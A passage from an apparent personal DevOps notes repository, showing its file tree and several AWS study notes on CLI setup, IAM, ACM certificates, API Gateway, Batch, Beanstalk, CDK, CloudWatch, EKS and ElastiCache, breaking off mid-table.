├── AWS ├── README.md ├── onboarding │ ├── README.md │ ├── aws-account.md │ ├── aws-cli.md │ ├── aws-overview.md │ ├── aws-pricing.md │ ├── cloud-models.md │ ├── saas-paas-vs-iaas.md │ └── serverless.md ├── scripts │ ├── aws-month-costs.sh │ └── aws-services-all-regions.sh └── services │ ├── acm.md │ ├── api-gateway.md │ ├── asg.md │ ├── aws-iac-comparison.md │ ├── batch.md │ ├── beanstalk.md │ ├── cdk.md │ ├── cloudformation.md │ ├── cloudwatch.md │ ├── compute.md │ ├── dbs.md │ ├── dynamodb.md │ ├── ebs-vs-efs-vs-instance-store-vs-s3.md │ ├── ebs.md │ ├── ec2-vs-beanstalk.md │ ├── ec2.md │ ├── ecs.md │ ├── efs.md │ ├── eks.md │ ├── elasticache.md │ ├── elb.md │ ├── example1.md │ ├── fsx.md │ ├── iam.md │ ├── lambda-vs-batch.md │ ├── lambda.md │ ├── lightsail.md │ ├── rds.md │ ├── route-53.md │ ├── s3.md │ ├── sns.md │ └── vpc.md ├── Applications └── Wakapi │ └── README.md ├── CI-CD └── Jenkins │ ├── Jenkinsfile │ ├── README.md │ └── installation.sh ├── Cloudflare └── README.md ├── DataStores ├── PostgreSQL │ └── README.md └── README.md ├── DevOps ├── NexusOSS.md ├── SonarQube.md └── tools │ ├── BUILD │ ├── README.md │ └── devops-tools.Dockerfile ├── Docker ├── commands.md ├── docker-compose-template.yml ├── dockerfile-notes.md ├── install-docker.sh └── swarm-notes.md ├── GIT ├── README.md └── concepts.md ├── GitHub └── actions.md ├── GitOps └── README.md ├── Hugo └── notes.md ├── IaC ├── Ansible │ ├── README.md │ ├── common-code-snippets.md │ ├── examples │ │ ├── 1.hello-world │ │ │ ├── RUNME │ │ │ ├── ansible.cfg │ │ │ └── servers │ │ ├── 10.tags │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 11.files │ │ │ ├── ansible.cfg │ │ │ ├── copy-and-extract-zip-playbook.yml │ │ │ ├── copy-file-playbook.yml │ │ │ ├── files │ │ │ │ ├── dummy_file.txt │ │ │ │ └── dummy_folder.zip │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 12.services │ │ │ ├── ansible.cfg │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 13.users │ │ │ ├── ansible.cfg │ │ │ ├── files │ │ │ │ └── sudoer_superuser │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 14.create-sudo-user-and-remove-become │ │ │ ├── ansible.cfg │ │ │ ├── bootstrap.yml │ │ │ ├── hosts-bootstrap │ │ │ ├── hosts-normal │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 15.roles │ │ │ ├── README.md │ │ │ ├── ansible.cfg │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ ├── roles │ │ │ │ ├── base │ │ │ │ │ └── tasks │ │ │ │ │ │ └── main.yml │ │ │ │ └── servers │ │ │ │ │ ├── files │ │ │ │ │ └── dummy-file-from-roles-example │ │ │ │ │ └── tasks │ │ │ │ │ └── main.yml │ │ │ └── run-playbook.sh │ │ ├── 16.host_vars │ │ │ ├── README.md │ │ │ ├── ansible.cfg │ │ │ ├── host_vars │ │ │ │ ├── 192.168.10.77.yml │ │ │ │ ├── 192.168.10.78.yml │ │ │ │ └── 192.168.10.79.yml │ │ │ ├── hosts │ │ │ │ └── servers │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 17.handlers │ │ │ ├── ansible.cfg │ │ │ ├── handlers.yml │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ └── run-playbook.sh │ │ ├── 18.templates │ │ │ ├── ansible.cfg │ │ │ ├── hosts │ │ │ ├── playbook.yml │ │ │ ├── run-playbook.sh │ │ │ └── templates │ │ │ │ └── dummy-template.j2 │ │ ├── 2.become-sudo │ │ │ ├── RUNME │ │ │ ├── ansible.cfg │ │ │ └── servers │ │ ├── 3.first-playbook │ │ │ ├── RUNME │ │ │ ├── ansible.cfg │ │ │ ├── install_package.yml │ │ │ ├── remove_package.yml │ │ │ └── servers │ │ ├── 4.debug-and-logs │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 5.playbook-and-become │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 6.multiple-distros │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 7.improve-playbooks-combine-tasks │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ ├── 8.improve-playbooks-use-variables │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ │ └── 9.groups-target-nodes │ │ │ ├── ansible.cfg │ │ │ ├── dummy-playbook.yml │ │ │ ├── hosts │ │ │ └── run-playbook.sh │ └── structure-template │ │ ├── README.md │ │ ├── RUN_BOOTSTRAP │ │ ├── ansible.cfg │ │ ├── bootstrap.yml │ │ ├── bootstrap_complete.yml │ │ ├── files │ │ └── root-dummy-file │ │ ├── group_vars │ │ ├── all │ │ └── servers.yml │ │ ├── handlers │ │ └── main.yml │ │ ├── host_vars │ │ ├── 192.168.10.77.yml │ │ ├── ansible-test-server-1.yml │ │ └── ansible-test-server-2.yml │ │ ├── hosts │ │ ├── servers.ini │ │ └── servers.yml │ │ ├── logs │ │ └── .gitignore │ │ ├── playbook.yml │ │ ├── roles │ │ └── base │ │ │ ├── files │ │ │ └── base-role-dummy-file │ │ │ ├── handlers │ │ │ └── main.yml │ │ │ └── tasks │ │ │ └── main.yml │ │ ├── templates │ │ └── dummy-root-template.j2 │ │ └── vars │ │ └── other_variables.yml ├── README.md ├── Terraform │ ├── 0-template │ │ ├── .gitignore │ │ └── main.tf │ ├── 1-local │ │ ├── .gitignore │ │ ├── providers.tf │ │ └── resources.tf │ ├── 2-tfstate-backends │ │ ├── .gitignore │ │ ├── providers.tf │ │ └── resources.tf │ ├── 3-variables │ │ ├── .gitignore │ │ ├── custom.tfvars │ │ ├── production.auto.tfvars │ │ ├── providers.tf │ │ ├── resources.tf │ │ ├── terraform.tfvars │ │ └── variables.tf │ ├── 4-modulles │ │ ├── .gitignore │ │ ├── local-file │ │ │ ├── .gitignore │ │ │ ├── output.tf │ │ │ ├── providers.tf │ │ │ ├── resources.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ │ └── main.tf │ ├── README.md │ ├── aws │ │ ├── README.md │ │ ├── ec2 │ │ │ ├── .gitignore │ │ │ ├── ec2-instances.tf │ │ │ ├── outputs.tf │ │ │ ├── providers.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ │ └── s3 │ │ │ ├── .gitignore │ │ │ ├── private-bucket.tf │ │ │ └── providers.tf │ ├── hashicorp-vault.md │ ├── proxmox │ │ ├── README.md │ │ └── clone-from-template-vm │ │ │ ├── .gitignore │ │ │ ├── main.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ └── structure-template │ │ ├── .gitignore │ │ ├── README.md │ │ ├── data.tf │ │ ├── locals.tf │ │ ├── main.tf │ │ ├── modules │ │ └── dummy │ │ │ ├── main.tf │ │ │ ├── outputs.tf │ │ │ ├── terraform.tfvars │ │ │ └── variables.tf │ │ ├── outputs.tf │ │ ├── providers.tf │ │ ├── terraform.tfvars │ │ └── variables.tf └── Vagrant │ ├── README.md │ ├── multi-vms │ └── Vagrantfile │ └── ubuntu-focal │ └── Vagrantfile ├── Java ├── Maven-http-server │ ├── .gitignore │ ├── README.md │ ├── checkstyle.xml │ ├── pom.xml │ └── src │ │ ├── main │ │ ├── java │ │ │ └── com │ │ │ │ └── example │ │ │ │ └── App.java │ │ └── webapp │ │ │ └── index.html │ │ └── test │ │ └── java │ │ └── com │ │ └── example │ │ └── AppTest.java ├── Simple-http-server │ ├── README.md │ ├── SimpleHttpServer.java │ └── index.html └── maven.md ├── Kubernetes ├── README.md ├── configuration-files │ └── hello-nginx.yml ├── kubeadm-cluster.md └── minikube.md ├── LICENSE ├── Linux ├── Debian │ └── apps-install.sh ├── Kernel │ └── README.md ├── RPM │ ├── CentOS │ │ └── README.md │ ├── README.md │ └── httpd │ │ ├── demo-http-server-simple.sh │ │ └── demo-http-server.sh ├── Systemd │ ├── README.md │ ├── examples │ │ └── ddns-update │ │ │ ├── INSTALL │ │ │ ├── update_ddns.service │ │ │ ├── update_ddns.sh │ │ │ └── update_ddns.timer │ ├── journalctl.md │ ├── my-dummy-service.service │ ├── service-template.service │ ├── service.md │ ├── target.md │ └── timer.md ├── Ubuntu │ └── workspaces.md ├── apt │ └── README.md ├── awesome-cli-tools.md ├── bash │ ├── bash-expansions.md │ ├── brackets.md │ ├── conditions.md │ ├── custom-bash-prompt.md │ ├── loops.md │ ├── program-variables.sh │ ├── uuid.md │ └── variables.md ├── bootloader.md ├── bu │ └── snapshots.md ├── build-and-install-kernel.md ├── cgroup │ └── README.md ├── chroot-liveusb.md ├── dnf │ └── README.md ├── files │ ├── files-on-unix.md │ └── system-info-files.md ├── load-average.md ├── logs │ └── README.md ├── misc │ └── README.md ├── processes.md ├── storage │ ├── disks-manipulation.md │ └── nfs.md ├── sudo.md ├── useful-commands.md └── users-management.md ├── Markdown ├── highlights.md ├── mermaid.md └── unicodes.md ├── Mikrotik ├── 0.Fresh-install.md ├── 1.Mikrotik-update.md ├── 2.Backup.md ├── Firewall.md ├── OVPN │ ├── OVPN-notes.md │ └── template.ovpn └── default-configuration ├── Misc ├── ipmi.md └── mdm.md ├── Monitoring ├── Prometheus │ ├── README.md │ └── examples │ │ └── hello-world │ │ ├── README.md │ │ └── prometheus.yml └── grafana.md ├── Networks ├── CCNA │ ├── README.md │ ├── cisco-packet-tracer.md │ └── sfp.md ├── VLAN │ └── README.md ├── commands.md ├── dhcpcd.md ├── dmz.md ├── dns-records.md ├── firewalls.md ├── high-availability.md ├── ip.md ├── mDNS.md ├── openwrt │ └── README.md ├── osi.md ├── packet-capture.md ├── pfsense │ └── README.md ├── ports.md ├── protocols │ └── tftp.md └── static-ip.md ├── Nginx-Proxy-Manager ├── README.md └── doc │ ├── npm-proxy.png │ └── npm-ssl.png ├── Proxmox ├── NVIDIA-GPU.sh ├── Portainer.md ├── README.md ├── backup-and-snapshots.md ├── cli.md ├── clustering.md ├── create-CT-template.md ├── create-CT.md ├── create-VM-template.md ├── create-VM.md ├── firewall.md ├── high-availability.md ├── installation.md ├── networking.md ├── post-installation.md ├── storage.md └── user-management.md ├── RDP ├── README.md └── Rustdesk.md ├── README.md ├── Rust └── notes.rs ├── SSH ├── README.md ├── reverse-shell.md ├── ssh-tunneling.md └── sshfs.md ├── Ventoy └── README.md ├── Virtualization ├── Gnome-boxes │ └── README.md ├── Multipass │ └── README.md └── Virtualbox │ └── ova-to-vm.sh ├── Web ├── CSS.md └── server │ └── static-demo-website │ ├── css │ └── style.css │ ├── index.html │ └── js │ └── function.js ├── Wordpress └── README.md └── ZSH └── fonts.md /AWS/README.md: -------------------------------------------------------------------------------- 1 | # AWS notes 2 | 3 | --- 4 | 5 | ## AWS utilization 6 | 1. Install VS-Code 7 | 2. [Install AWS CLI](./aws-cli.md) 8 | 3. AWS Cloudshell 9 | 10 | ## Account 11 | Read [IAM](./services/iam.md) to create your first account. 12 | 13 | ## Overview 14 | To gain a basic understanding of AWS read [this](./onboarding/aws-overview.md) 15 | 16 | 17 | ## [Free Tier](https://aws.amazon.com/free/?p=ft&z=subnav&loc=2&all-free-tier.sort-by=item.additionalFields.SortRank&all-free-tier.sort-order=asc&awsf.Free%20Tier%20Types=*all&awsf.Free%20Tier%20Categories=*all) 18 | --- 19 | 20 | -------------------------------------------------------------------------------- /AWS/onboarding/README.md: -------------------------------------------------------------------------------- 1 | # AWS start up guide 2 | 3 | 0. [What is a public cloud](./cloud-models.md). 4 | 1. Read [AWS overview](./aws-overview.md) to understand the basics. 5 | 2. Create an AWS account by following [this guide](./aws-account.md#-start-here-) 6 | 3. Then create a [new IAM user](../services/iam.md#create-iam-user). 7 | 4. If you want to access AWS from a terminal, you are now ready to install & configure [AWS CLI](./aws-cli.md), or you can use [Cloudshell](#). -------------------------------------------------------------------------------- /AWS/onboarding/aws-cli.md: -------------------------------------------------------------------------------- 1 | # AWS CLI 2 | 3 | ## Install AWS CLI 4 | [Instructions](https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html) to install AWS cli. 5 | 6 | E.g. Debian-based system 7 | ``` 8 | curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" 9 | unzip awscliv2.zip 10 | sudo ./aws/install 11 | ``` 12 | 13 | ## Reference 14 | Visit [AWS CLI reference](https://docs.aws.amazon.com/cli/latest/reference/) for details. 15 | 16 | To have access to our account from the aws-cli as a best practice, we are going to create a new IAM user which will have access. 17 | 18 | --- 19 | 20 | ## 1. Create an IAM User to have CLI access 21 | 1. Login to AWS 22 | 2. Search for `IAM` 23 | 3. In `User Managment` 24 | 4. `Users` 25 | 5. `Create User` 26 | 6. Give username 27 | 7. `Next` 28 | 8. Permissions options set to `Attach policies directly` 29 | 9. Give the permissions that you want (e.g. `AdministratorAccess`) 30 | 10. `Next` 31 | 11. `Create User` 32 | 33 | To use this user from aws-cli we need access keys. Hence, click on the user, to create the access keys. 34 | 35 | ## 2. Create Access Keys 36 | 1. Login to AWS 37 | 2. Search for `IAM` 38 | 3. In `User Managment` 39 | 4. `Users` 40 | 5. Click on your user 41 | 6. Go to `Security Credentials` 42 | 7. `Access keys` 43 | 8. `Create access keys` 44 | 9. `Command Line Interface (CLI)` 45 | 10. `Create access keys` 46 | 47 | **DO NOT REVIEL ACCESS KEY AND SECRET ACCESS KEY!!!** 48 | 49 | ## 3. AWS-CLI Configuration 50 | To configure the cli run 51 | ``` 52 | $ aws configure 53 | AWS Access Key ID [None]: 54 | AWS Secret Access Key [None]: 55 | Default region name [None]: us-east-1 56 | Default output format [None]: json 57 | ``` 58 | 59 | Then, the input will be stored in `~/.aws/credentials` and `~/.aws/config` as plaintext. 60 | 61 | ## 4. Verification 62 | To verify that aws-cli is linked with your account, run. 63 | `aws sts get-caller-identity` 64 | 65 | --- 66 | 67 | > [!TIP] 68 | > As an alternative, you can also use `Cloudshell` a service available on the `Management Console` that does not require `access keys`. 69 | > 70 | > However, Cloudshell is not available on all regions. 71 | -------------------------------------------------------------------------------- /AWS/onboarding/serverless.md: -------------------------------------------------------------------------------- 1 | # Serverless 2 | Serverless is a **cloud computing model** where the **cloud provider** automatically **manages** the infrastructure, allowing developers to focus solely on writing code without worrying about provisioning, managing, or scaling servers. 3 | 4 | **AWS serverless services examples:** 5 | 1. [S3](../services/s3.md) 6 | 2. [DynamoDB](../services/dynamodb.md) 7 | 3. [Fargate](../services/ecs.md#elastic-container-service-ecs) 8 | 4. [Lambda](../services/lambda.md) 9 | 10 | 11 | **Benefits:** 12 | - **Simplified Development:** No need to manage infrastructure, which accelerates development. 13 | - **Cost-Effective:** You only pay for what you use, making it more cost-efficient for applications with variable traffic. 14 | - **Faster Time to Market:** With less infrastructure to manage, applications can be developed and deployed faster. -------------------------------------------------------------------------------- /AWS/services/acm.md: -------------------------------------------------------------------------------- 1 | # AWS Certificate Manager (ACM) 2 | 3 | ## Request a Certificate 4 | To enable https on a service we must first create a certifate, since we are using AWS 5 | and it is free, we can create a certificate using ACM. 6 | 7 | 1. Search `ACM Certificate Manager` 8 | 2. `Request` 9 | 3. `Request a public certificate` 10 | 4. Give your: `*.com` (put star at the beginning) 11 | 5. `DNS validation` 12 | 6. Create your certificate 13 | 14 | ## Domain name register 15 | Then copy `CNAME name` & `CNAME value` from your ACM and copy those values to your domain name registry as follows. 16 | - For `CNAME name` remove the domain part and keep only the underscore with the random numbers. 17 | - For `CNAME value` remove the dot at the end. 18 | 19 | | record type | Name | Data | 20 | | ------------| ----| -------| 21 | | CNAME | _\ | _\.\.acm-validations.aws | 22 | 23 | Evaluation: 24 | `dig @8.8.8.8 CNAME _. +short` 25 | 26 | The above command should return the `CNAME value`. -------------------------------------------------------------------------------- /AWS/services/api-gateway.md: -------------------------------------------------------------------------------- 1 | # API Gateway 2 | AWS API Gateway is a **fully managed** service that allows you to create, publish, maintain, monitor, and secure APIs for your applications. It acts as an **interface** between clients (such as web or mobile applications) and backend services (such as AWS [Lambda](./lambda.md) functions, [EC2](./ec2.md) instances, or any HTTP endpoint). 3 | 4 | | Feature | Description | 5 | | ------- | ------------| 6 | | API Creation and Management | Easily create RESTful, WebSocket, or HTTP APIs with minimal setup and configuration. 7 | | Serverless | Integrates seamlessly with AWS [Lambda](./lambda.md), allowing you to build [serverless](../onboarding/serverless.md) applications that don’t require you to manage servers. 8 | | Scalable | Automatically scales to handle large numbers of API calls without any manual intervention. 9 | | Routing and Transformation | You can route requests to different backend services and perform transformations (e.g., converting XML to JSON) before sending the request to the backend. 10 | | Authentication and Authorization | Supports a variety of authentication mechanisms (IAM, Lambda authorizers, Amazon Cognito, etc.) to secure your APIs. 11 | | Traffic Management | Provides features like throttling, request validation, and rate limiting to ensure your API performs well under high traffic loads. 12 | | Monitoring and Logging | Integrated with Amazon CloudWatch, allowing you to monitor API performance, track errors, and log requests/responses for debugging. 13 | | API Versioning | Supports versioning, so you can manage different versions of your API without disrupting users. 14 | | Cost-Effective | Pay-as-you-go pricing model, where you only pay for the API calls you handle and the data transferred. 15 | 16 | Example 17 | ```mermaid 18 | graph LR 19 | subgraph clientside[" "] 20 | direction LR 21 | Client <--> |Rest API| apigateway["API Gateway"] 22 | end 23 | style clientside opacity:0 24 | 25 | apigateway <--> |Proxy Requests| lambda 26 | 27 | subgraph serverside[" "] 28 | direction LR 29 | lambda((Lambda)) <--> |CRUD| db[("DynamoDB")] 30 | end 31 | style serverside opacity:0 32 | ``` -------------------------------------------------------------------------------- /AWS/services/aws-iac-comparison.md: -------------------------------------------------------------------------------- 1 | # Infrastructure as Code (IaC) comparison solutions 2 | 3 | 4 | ## AWS CDK vs CloudFormation vs Terraform 5 | | Feature | [AWS CDK](./cdk.md) | [CloudFormation](./cloudformation.md) | Terraform | 6 | | --------| --------| ---------------| ----------| 7 | | Language | TypeScript, Python, Go, Java, C# | YAML/JSON | HCL (HashiCorp) 8 | | Resource Management | AWS CloudFormation | AWS CloudFormation | Terraform Engine 9 | | Modularity | High (Classes, Functions) | Low (YAML Templates) | Medium (Modules) 10 | | Multi-Cloud | No (AWS Only) | No (AWS Only) | Yes (AWS, GCP, Azure) 11 | | Ease of Use | High (Code-based) | Medium (Declarative) | Medium (Declarative) 12 | | State Management | CloudFormation Manages | CloudFormation Manages | Requires Remote Backend 13 | 14 | ## AWS CDK vs CloudFormation use cases 15 | | Use Case | AWS CDK | CloudFormation | 16 | | ------| -------- | ------------- | 17 | | Programmatic logic needed (e.g., loops, conditions, dynamic naming) | ✅ Yes | ❌ No 18 | | Quick setup & best practices | ✅ Yes | ❌ No 19 | | Easier collaboration with DevOps & Developers | ✅ Yes | ❌ No 20 | | Strict declarative infrastructure (No programming required) | ❌ No | ✅ Yes 21 | -------------------------------------------------------------------------------- /AWS/services/batch.md: -------------------------------------------------------------------------------- 1 | # Batch 2 | AWS Batch is a **fully managed** batch processing service that allows you to run batch jobs at any scale. It enables you to efficiently run and scale hundreds or thousands of batch computing jobs in the cloud, without needing to manually manage infrastructure. 3 | 4 | > [!NOTE] 5 | > A batch job is a type of job or task that has a defined **start** and **end** point, processing data in **discrete** chunks rather than continuously. 6 | 7 | Batch will spawn [EC2](./ec2.md) or [Spot](#) Instances. 8 | 9 | 10 | | Feature | Description | 11 | | --------------- | ------------ | 12 | | Automatic Scaling | AWS Batch automatically provisions and scales compute resources based on the volume and resource requirements of your batch jobs. 13 | | Managed Infrastructure | You don’t need to worry about managing servers, clusters, or queues. AWS Batch handles the infrastructure for you. 14 | | Job Scheduling | You can submit, monitor, and manage batch jobs using the AWS Management Console, CLI, or SDKs. It also supports job dependencies and prioritization. 15 | | Support for Docker Containers | You can use Docker containers to package and run your batch jobs, enabling a consistent environment for job execution. 16 | | Compute Environment Selection | AWS Batch integrates with Amazon [EC2](./ec2.md) (on-demand or spot instances) and Amazon [EC2](./ec2.md) Auto Scaling groups to provide appropriate compute resources. 17 | | Flexible Job Queues | You can define job queues for different priority levels and types of jobs. 18 | | Cost Efficiency | Using [Spot](#) instances can help reduce the cost of running batch jobs. 19 | 20 | > [!IMPORTANT] 21 | > A comparison between Lambda and Batch is available [here](./lambda-vs-batch.md). 22 | -------------------------------------------------------------------------------- /AWS/services/beanstalk.md: -------------------------------------------------------------------------------- 1 | # Beanstalk 2 | AWS Elastic Beanstalk is a **Platform as a Service (PaaS)** that helps developers deploy, manage, and scale applications easily without worrying about the underlying infrastructure. It supports multiple programming languages and automatically handles provisioning, load balancing, scaling, and monitoring. 3 | 4 | > [!NOTE] 5 | > For a full comparison between EC2 and Beanstalk, read [this](./ec2-vs-beanstalk.md). 6 | 7 | --- 8 | 9 | | Feature | Description | 10 | | ------- | ----------- | 11 | | **Fully Managed Deployment** | Automatically provisions and configures AWS resources like [EC2](./ec2.md), [ELB](./elb.md), Auto Scaling Groups, and [RDS](./rds.md). 12 | | **Supports Multiple Programming Languages** | Works with Python, Java, Node.js, .NET, Ruby, PHP, and Go. 13 | | **Built-in Load Balancing & Auto Scaling** | Manages traffic and adjusts resources based on demand. 14 | | **Infrastructure Control** | You can still access and customize the underlying EC2 instances, security groups, and databases. 15 | | **Integration with Developer Tools** | Supports Git, Jenkins, AWS CLI, and IDEs like Visual Studio and IntelliJ. 16 | | **Monitoring & Logging** | Uses Amazon CloudWatch and AWS X-Ray for performance tracking and debugging. 17 | | **Zero Additional Cost** | You pay only for the AWS resources it provisions (EC2, RDS, etc.), not the Elastic Beanstalk service itself. 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /AWS/services/cdk.md: -------------------------------------------------------------------------------- 1 | # Cloud Development Kit (CDK) 2 | The AWS Cloud Development Kit (CDK) is an **Infrastructure as Code (IaC)** framework that allows you to define cloud infrastructure using programming languages like **TypeScript, Python, Java, C#, and Go** instead of writing raw **YAML/JSON** templates like in [AWS CloudFormation](./cloudformation.md). 3 | 4 | > [!NOTE] 5 | > Using **CDK** both application and infrastructure can be written together in the same language. 6 | 7 | > [!WARNING] 8 | > For a full comparison between different IaC solutions in AWS, read [this](./aws-iac-comparison.md). 9 | 10 | 11 | **Example**: 12 | ```python 13 | from aws_cdk import core 14 | import aws_cdk.aws_s3 as s3 15 | 16 | class MyS3Stack(core.Stack): 17 | def __init__(self, scope: core.Construct, id: str, **kwargs): 18 | super().__init__(scope, id, **kwargs) 19 | 20 | s3.Bucket(self, "MyBucket", bucket_name="my-cdk-bucket") 21 | 22 | app = core.App() 23 | MyS3Stack(app, "MyS3Stack") 24 | app.synth() 25 | ``` 26 | 27 | **Use cases**: 28 | - When deploying with docker via [ECS](./ecs.md)/[EKS](./eks.md). 29 | - When deploying with [Lambda](./lambda.md) functions. 30 | 31 | ```mermaid 32 | graph LR 33 | 34 | subgraph langs["Programming languages"] 35 | direction LR 36 | subgraph cdk-app["CDK Application"] 37 | direction LR 38 | lambda 39 | s3 40 | etc["..."] 41 | style etc opacity:0 42 | end 43 | end 44 | 45 | cdk-app --> cdk-cli 46 | 47 | cdk-cli["CDK CLI"] --> cloudformation-template["Cloudformation Template"] 48 | cloudformation-template --> Cloudformation 49 | ``` -------------------------------------------------------------------------------- /AWS/services/cloudwatch.md: -------------------------------------------------------------------------------- 1 | # CloudWatch 2 | Amazon CloudWatch is a monitoring and observability service offered by AWS that provides actionable insights into your AWS resources and applications. 3 | 4 | --- 5 | 6 | # Add here a note 7 | > [[Note]] 8 | > By default Cloudwatch will update its metrics every 5 minutes. However, it can be reduced down to one minute, by enabling detailed monitoring. Which has some cost. 9 | 10 | ## Metrics 11 | Tracks performance metrics from AWS services (e.g. EC2, RDS, etc) 12 | 13 | ## Events 14 | 15 | ## Logs 16 | 17 | --- 18 | 19 | ## Example 20 | Set an alarm for EC2 when CPU utilization is greater than 60% for 5 minutes. 21 | 1. Go to `Cloudwatch` 22 | 2. `All alarms` 23 | 3. `Create alarm` 24 | 4. `Select Metric` 25 | 5. `EC2` 26 | 6. IMPORTANT! Make sure that Instance ID is correct!!! 27 | 7. Select instance `CPUUtilization` 28 | 8. Set `Static` threshold type 29 | 9. Set the value 30 | 10. For period set `5 minutes` 31 | 11. `Next` 32 | 12. Set `In alarm` 33 | 13. Define the notification: `Select existing topic` 34 | 14. Send a notification to `MonitoringTeam` 35 | 15. Add also for the example a EC2 action 36 | 37 | --- 38 | --- 39 | 40 | ## CLI 41 | 42 | List Log Groups 43 | `aws logs describe-log-groups` 44 | 45 | Get Log Events 46 | `aws logs get-log-events --log-group-name my-log-group --log-stream-name my-log-stream` 47 | -------------------------------------------------------------------------------- /AWS/services/compute.md: -------------------------------------------------------------------------------- 1 | # AWS Compute Services 2 | 3 | 1. [EC2](./ec2.md) 4 | 2. [ECS - Docker on EC2/Fargate](./ecs.md) 5 | 3. [Batch](./batch.md) 6 | 4. [Lambda](./lambda.md) 7 | 5. [Lightsail](./lightsail.md) -------------------------------------------------------------------------------- /AWS/services/ec2-vs-beanstalk.md: -------------------------------------------------------------------------------- 1 | # [EC2](./ec2.md) vs [Beanstalk](./beanstalk.md) 2 | 3 | 4 | ## "Traditional deployment" 5 | ```mermaid 6 | --- 7 | title: 3-Tier Application 8 | --- 9 | %%{init: {'theme':'neutral'}}%% 10 | graph LR 11 | 12 | subgraph users[" "] 13 | direction LR 14 | user1(("User")) 15 | user2(("User")) 16 | user3(("User")) 17 | end 18 | style users opacity:0 19 | 20 | user1 --> elb 21 | user2 --> elb 22 | user3 --> elb 23 | 24 | subgraph elb-sub["Multi AZ"] 25 | direction LR 26 | elb(("ELB")) 27 | end 28 | style elb-sub stroke:#000,stroke-width:2px,stroke-dasharray: 10 10 29 | 30 | subgraph ec2-sub["Auto Scaling Group"] 31 | direction LR 32 | subgraph ec2-sub-az1["AZ 1"] 33 | direction LR 34 | ec2-1["EC2"] 35 | end 36 | subgraph ec2-sub-az2["AZ 2"] 37 | direction LR 38 | ec2-2["EC2"] 39 | end 40 | subgraph ec2-sub-az3["AZ 3"] 41 | direction LR 42 | ec2-3["EC2"] 43 | end 44 | end 45 | 46 | elb <--> ec2-1 47 | elb <--> ec2-2 48 | elb <--> ec2-3 49 | 50 | subgraph db-sub[" "] 51 | direction LR 52 | cache("ElastiCache") 53 | rds[("RDS")] 54 | end 55 | style db-sub opacity:0 56 | 57 | ec2-1 <--> cache 58 | ec2-2 <--> cache 59 | ec2-3 <--> cache 60 | 61 | ec2-1 <-.-> rds 62 | ec2-2 <-.-> rds 63 | ec2-3 <-.-> rds 64 | ``` 65 | 66 | **PROBLEM?** 67 | If we want to focus more on the code instead of focusing with infrastructure, we can use [Beanstalk](./beanstalk.md). 68 | 69 | | Feature | Elastic [Beanstalk](./beanstalk.md) | [EC2](./ec2.md) (Manual Deployment) | AWS [Lambda](./lambda.md) | 70 | | -----| ------------------- | -------------------------| --------------| 71 | | Use Case | Web applications with managed infra | Full control over servers | Serverless apps with event-driven execution 72 | | Infrastructure Management | Fully managed | Manual | Fully managed 73 | | Auto Scaling | Built-in | Requires configuration | Automatic 74 | | Customization | Moderate | High | Limited 75 | | Supported Languages | Python, Java, Node.js, .NET, PHP, Ruby, Go | Any | Any 76 | | Pricing Model | Pay for underlying AWS resources | Pay for EC2 resources | Pay per execution -------------------------------------------------------------------------------- /AWS/services/eks.md: -------------------------------------------------------------------------------- 1 | # Elastic Kubernetes Service (EKS) 2 | A fully managed service that simplifies the deployment, management, and scaling of Kubernetes clusters on AWS. It abstracts the complexity of managing Kubernetes infrastructure while providing powerful tools for building containerized applications. 3 | 4 | --- 5 | 6 | **EKS** can manage containers in both options that [ECS](./ecs.md) supports, i.e. **EC2** and **Fargate**. 7 | 8 | 9 | > [!IMPORTANT] 10 | > Kubernetes is cloud-agnostic 11 | 12 | --- 13 | 14 | ## CLI 15 | 16 | List Clusters 17 | `aws eks list-clusters` 18 | 19 | Create a Cluster 20 | `aws eks create-cluster --name my-cluster --role-arn my-role --resources-vpc-config subnetIds=subnet-12345,subnet-67890` 21 | 22 | Delete a Cluster 23 | `aws eks delete-cluster --name my-cluster` -------------------------------------------------------------------------------- /AWS/services/elasticache.md: -------------------------------------------------------------------------------- 1 | # ElastiCache 2 | ElastiCache is a fully managed, **in-memory** **data store** and **caching** service provided by AWS. It is designed to improve the performance of applications by enabling low-latency access to frequently accessed data. ElastiCache supports two popular open-source engines: **Redis** and **Memcached**. 3 | 4 | Concept: 5 | ```mermaid 6 | graph LR 7 | 8 | web 9 | elb(("ELB")) 10 | ec2["EC2"] 11 | elasticache[("ElastiCache")] 12 | rds@{ shape: lin-cyl, label: "RDS"} 13 | 14 | style web opacity:0 15 | 16 | 17 | web -.-> elb 18 | elb -->ec2 19 | 20 | ec2 <--> |Read/Write from cache 21 | fast| elasticache 22 | ec2 <--> |Read/Write from DB 23 | slow| rds 24 | ``` -------------------------------------------------------------------------------- /AWS/services/lambda-vs-batch.md: -------------------------------------------------------------------------------- 1 | # [Lambda](./lambda.md) vs [Batch](./batch.md) 2 | 3 | | Feature | Batch | AWS Lambda 4 | | --------| -------| ----------- 5 | | Execution Model | Executes batch jobs with defined start and end points. | Executes code in response to events 